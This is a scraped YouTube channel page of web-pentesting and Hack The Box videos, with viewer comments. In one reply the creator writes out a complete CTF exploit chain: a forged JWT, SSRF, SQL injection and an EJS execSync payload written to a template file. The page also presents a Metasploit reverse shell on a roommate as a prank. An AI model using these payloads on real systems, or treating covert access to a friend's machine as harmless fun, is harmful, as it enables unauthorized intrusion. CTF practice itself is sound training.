Milos Markovic

Videos

How Online Copy-Paste Could Expose Your Data #cybersecurity
49 views, 5 months ago
CVE-2023-45539 & CVE-2022-39227 | HTB LockTalk Web Challenge
77 views, 5 months ago
In this video, I went over HTB LockTalk which includes CVE-2023-45539 & CVE-2022-39227.
Data Exfiltration using Curl and Python with SSTI RCE | HTB Labyrinth Linguist Web Challenge
247 views, 5 months ago
In this video, I went over Data exfiltration using Curl and Python with the help of Server-Side Template Injection RCE.
Burp Suite Certified Practitioner Exam Review 2024
1K views, 6 months ago
In this video, I provide an in-depth review of the BSCP Exam, along with valuable tips and strategies to help you prepare and succeed.
Hack The Box Blueprint Heist Web Challenge
281 views, 6 months ago
In today's video, I went over the Blueprint Heist challenge from HTB Business CTF 2024.
Hack The Box Jailbreak Web Challenge
353 views, 6 months ago
In this video, I went over a recently retired HTB Challenge called Jailbreak which was about XXE Injection. Thank you for watching! #hackthebox #XXE #WebAppPentesting #burpsuite
Linux Privilege Escalation with SUID sed Command
24 views, 7 months ago
In this video, I demonstrated a simple privilege escalation technique with the SUID bit set on the sed command. #cybersecurity #linux #privesc #pentesting
OpenVPN Peer Certificate Verification Failure #openvpn #hackthebox
7K views, 10 months ago
In this video, I explained how to overcome the "Peer Certificate Verification Failure" Error message from OpenVPN when connecting to HackTheBox Network from Windows Machine. P.S. I don't know why my mouse is not showing up on the video, sorry for that!
Hacking My Roommate with Metasploit Reverse Shell!
2.3K views, 1 year ago
Hey, hackers and tech enthusiasts! 👋 In this video, I dive into the world of ethical hacking with a touch of humor as I explore the fascinating realm of Metasploit and reverse shells. Join me on this laughter-packed journey as I demonstrate how to use Metasploit for educational purposes, pranking friends in a lighthearted manner. We'll uncover the power of ethical hacking while sharing a few la...
Cloudgoat S3 ACL Error
177 views, 1 year ago
In this video, I talked about how to solve ACL Errors when deploying a Cloudgoat scenario that has an S3 bucket in its resources.

COMMENTS

  • @CuliRBLX 7 days ago

    Great video Milos!

  • @other6724 8 days ago

    didn't work. still get the same error

  • @Baikanikintrist 10 days ago

    But how do I solve it on Android?

    • @milosmarkovic4566 10 days ago

      @Baikanikintrist Hello, thanks for watching! That is a great question! Unfortunately I didn’t test it out on Android so I don’t have an answer.

  • @Salih-rz6yl 16 days ago

    Hey thanks for the tutorial. But how did you know that the flag.txt is in the root directory? What if the flag.txt was in a folder and in another subfolder etc. ...How to find out?

    • @milosmarkovic4566 15 days ago

      Hello, no problem, thank you for watching! That is an amazing question! So in this particular scenario, after I identified XML Injection by being able to read /etc/passwd, my next payload was for the flag.txt. So I didn't spend too much time trying to read the flag from other directories such as /home/flag.txt or /var/www/html/flag.txt, etc. When it comes to XXE usually you would try to read local files that are mostly present on every system such as /etc/passwd for UNIX machines or C:/Windows/win.ini on Windows boxes, it can be challenging with XXE to enumerate other files that are not common. In this case, with HTB Challenges we know that we are aiming for flag.txt so if I didn't find it with a payload such as file:///flag.txt I would try different directories such as /home/flag.txt or /opt/flag.txt or similar. I think for this challenge they simply placed it in the current directory so you don't have to spend time enumerating the system for a flag, but rather exploiting XXE Injection. I hope this helps! Please let me know if you have any other questions/thoughts!

  • @__pain__05 1 month ago

    Can we use Burp Pro Trial [15 days] version? On exam?

    • @milosmarkovic4566 1 month ago

      Thank you for watching! That's a great question! I didn't find much online about this question besides this old Blog Post from PortSwigger's Forum all the way back in 2021: forum.portswigger.net/thread/free-trial-cf41d2d7bc962fd966d168dbd (you might need to scroll down to find a question from user named Tony). According to the PortSwigger reply, they do not check whether you are using a personal license or a company license nor do we check if you are using a purchased license or a trial license. Now since this was 2021, things might have changed. I think it's the best bet to ask in their Discord: discord.com/invite/portswigger

  • @TheRealVegapunk 1 month ago

    How much did this certification help you to become a web application penetration tester?

    • @milosmarkovic4566 1 month ago

      Thank you for watching and thank you for the great question! This certificate is by far my favorite one because I enjoy web app pentesting and I love AppSec. If you would like to become a web application pentester I do believe that this certificate can help you a lot because of the wide variety of topics that it covers, and it really forces the learner to understand each vulnerability in depth. This is from a knowledge perspective; when it comes to the Job Requirement Perspective, I don't have much experience there because I got this certificate after I landed a job, but when I was actively searching for a job I saw multiple job postings listing BSCP as a preferred / required cert. Regardless of whether it's being listed in the Job Description or not, I think this is an amazing cert and it helped me a lot when it comes to exploiting different vulnerabilities and understanding those vulnerabilities / misconfigurations better than before. I hope this helps!

  • @mikemd866 2 months ago

    you saved my life lol, ty

    • @milosmarkovic4566 2 months ago

      @mikemd866 No problem! I am glad that video helped! 🙂

  • @S2eedGH 3 months ago

    great explanation, btw can you put the exploits so we can copy thanks

    • @milosmarkovic4566 3 months ago

      Thank you very much! Here are my notes for this challenge with all commands:

      1) For /admin & /graphql endpoint I need a valid JWT cookie with a role being set to admin
      1.1) I found a JWT Secret hardcoded --> Str0ng_K3y_N0_l3ak_pl3ase? and by using jwt.io I was able to forge a cookie and to set my role to be admin
      2) I found SSRF when generating report and I was able to call Collaborator
      3) I was able to access /admin by forging JWT Token with jwt.io to be equal to admin for user role and by passing url in the generate-report function as: 127.0.0.1/admin?token=<token>
      4) I was able to execute GraphQL Queries with the following url:
      127.0.0.1:1337/graphql?token=<FORGED_ADMIN_TOKEN>&query={getDataByName(name:"John"){name,department,isPresent}}
      5) Now this is vulnerable to SQLI because the regex ignores everything after newline character, so we are UNICODING not to break the GraphQL Query, and from there we conducted classic UNION BASED Attack to find out exact number of columns (4):
      127.0.0.1:1337/graphql?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3MTkwNzQyODB9.pEww2SEUcXqPFgdWzYPWBfYLNaIf-J-XMLFLm-ciRRU&query={getDataByName(name:"a\u000d\u000a'UNION SELECT NULL,NULL,NULL,NULL-- "){name,department,isPresent}}
      ---> note space after comment since we are using MySQL
      5.1) Now payload for combining sql injection with ejs code execution:
      &query={getDataByName(name:"a\u000d\u000a'UNION SELECT '<%- global.process.mainModule.require(`child_process`).execSync(`/readflag`) %>',NULL,NULL,NULL INTO OUTFILE '/app/views/errors/404.ejs'-- "){name,department,isPresent}}
      6) Now when we navigate to the nonexisting location 404.ejs will be triggered such as /test and we got the flag!

    • @S2eedGH 3 months ago

      @milosmarkovic4566 appreciate it

  • @imaverygoodguy 3 months ago

    thanks a lot mate, you explain very well

    • @milosmarkovic4566 3 months ago

      @imaverygoodguy Thank you very much for watching! I am glad that you found video useful! 🙂

  • @closevote 4 months ago

    thank you

    • @milosmarkovic4566 4 months ago

      @closevote Of course, it’s my pleasure! I am glad that video helped!

  • @cristiannastase5530 4 months ago

    Thank you. How did you become so good?

    • @milosmarkovic4566 4 months ago

      Of course! Haha far away from good, but thanks! :D

  • @noragami1555 5 months ago

    great video

  • @MarkoJovanovic-mb2ge 5 months ago

    Love it, Milos!!

  • @CuliRBLX 6 months ago

    This guy is going to be the best hacker in the world one day!

  • @Wii602006 6 months ago

    I'm getting the same error, was working fine for months and today I got this message, tried your solution and still not working... same error, help

    • @UKGUN1T 6 months ago

      Just had same error pls let me know if ya find a solution

    • @milosmarkovic4566 6 months ago

      Hmm, that is interesting! I will take a look at it, and I will let you know if I find a solution!

    • @Wii602006 6 months ago

      @milosmarkovic4566 UPDATE: I sent an email to Dev and they were just having technical issues, it has been fixed :)

  • @tomtomtom456 7 months ago

    Thanks a lot

  • @MrEnsiferum77 7 months ago

    Not working for me...

    • @milosmarkovic4566 7 months ago

      Hi, what did you try so far, and what is the error message that you are facing?

    • @MrEnsiferum77 7 months ago

      @milosmarkovic4566 I've figured it out. I was trying first to make it work through WSL2, but then I've tried just regular Windows OpenVPN client, which for some reason gave me this error, but actually the problem was in generated keys (I was playing around with tryhackme). Actually tryhackme gives u multiple regions, only one for europe keys was working... the other regions (even europe) was giving some errors both wsl2 or windows (in case of windows this error)

    • @ziadbensaada 5 months ago

      @milosmarkovic4566 when I want to connect to tryhackme vpn

  • @andymcao 7 months ago

    This was super helpful - thank you!

    • @milosmarkovic4566 7 months ago

      Thank you for watching! I am glad that video helped out! :)

  • @markobunic6734 8 months ago

    Awesome, thank you!

  • @pnemonick 9 months ago

    Thank you so much

  • @Prince-od7od 9 months ago

    Can you do one more help? I got a foothold for a machine trying to load the RCE payload but when entering openvpn ip it's not giving me shell even though everything is correct

    • @milosmarkovic4566 9 months ago

      I would suggest checking your payload one more time, if you are successfully connected via OpenVPN there is no reason not to obtain the shell if everything is in place. I don't want to reveal any big spoilers, but I suggest checking what version of ysoserial you are using, and I was using PowerShell base64 encoded payload. I hope this helps!

  • @Prince-od7od 9 months ago

    Thank you so much 🙌🙌🙌

    • @milosmarkovic4566 9 months ago

      No Problem! I am glad that video helped! 🙂

  • @CuliRBLX 9 months ago

    Thank you Milos!

  • @MarkoJovanovic-mb2ge 9 months ago

    Great content as usual!

  • @P3ntest3r 9 months ago

    Bro thanks so much am ur new subscriber from Africa it really help me coz I get this error for so long god bless more content 🎉🎉

    • @milosmarkovic4566 9 months ago

      Thank you very much! I am happy that the video helped out! I am working actively on more content! :)

  • @NickSpern 10 months ago

    I had similar problem with iOS and Android mobile connection, they play with this solution, thanks

    • @milosmarkovic4566 10 months ago

      I didn’t know that this error is occurring on mobile devices as well! I am glad that video helped!

  • @gadgetbro02 10 months ago

    In my machine, only your instructed way can't solve this issue, so I regenerate the (.OVPN) file again. After that download and load it to OpenVPN, apply your instructed setting and it's booom. Connected! [I said all of those things because someone might get a solution from my comment]

  • @CertaintyOfDeath 10 months ago

    You are not the only one that had the same problem doing the same machine, ty

    • @milosmarkovic4566 10 months ago

      That’s right! I heard that many people were struggling with the same thing. No problem, I am glad it helped!

  • @bozhdiarjordanov6353 1 year ago

    good tutorial make more for metasploit and reverse shell

    • @milosmarkovic4566 1 year ago

      Thank you! I appreciate it a lot! Noted, will do in the future, for sure!

  • @itsm3dud39 1 year ago

    Does this work if the victim is inside another network??

    • @milosmarkovic4566 1 year ago

      Hi, thanks for watching! In that case, I believe that would require port forwarding in order to make this happen.

  • @ytg6663 1 year ago

    Vanilla metasploit malware gets easily detected 🤣🤣

    • @milosmarkovic4566 1 year ago

      Yes, when you have AV and when you update your system, unlike my friend! That was the purpose of the video, to highlight the importance of it 🙂. Thank you for watching and commenting! 🙂

  • @sparkeyluv 1 year ago

    I wish you would have shown us your enumeration phase

    • @milosmarkovic4566 1 year ago

      Thank you for watching and I appreciate the suggestion! Next time I will definitely do so.

  • @l_u_c_k_y_7 1 year ago

    555-333 under Metasploit, bro, excellent video

  • @dgoncalo 1 year ago

    This is the dumbest script kid video I’ve seen, and to all the people in the comments thinking this is real hacking, IT'S NOT! So first, any msfvenom payload is gonna get flagged by AV. It takes a professional to be able to correctly obfuscate the signatures these days. Secondly, why are you even hiding IP addresses on the video? You do know that those IPs are only on your local network right? They’re not actually the real public IPs. If you guys want to learn real offensive security go study with reliable sources, not some script kids

  • @samioul9180 1 year ago

    I just want to know why y u hiding your internal IP address

  • @cryptoafc7655 1 year ago

    1 sub earned - love these videos

  • @RAZREXE 1 year ago

    haha very cool, I'm a sub now. hilarious prank dude XD

  • @Hackashi 1 year ago

    hahaha that smile on your face when he finds out.

  • @Hamstergaming11 1 year ago

    Can I study with you🙏...

  • @draganomci 1 year ago

    Cool stuff, we need more videos like this!

  • @Maradona024 1 year ago

    Hahahah this is hilarious dude… great work on this one!

  • @MarkoJovanovic-mb2ge 1 year ago

    Haha, brilliant! I will definitely use this to prank my friends!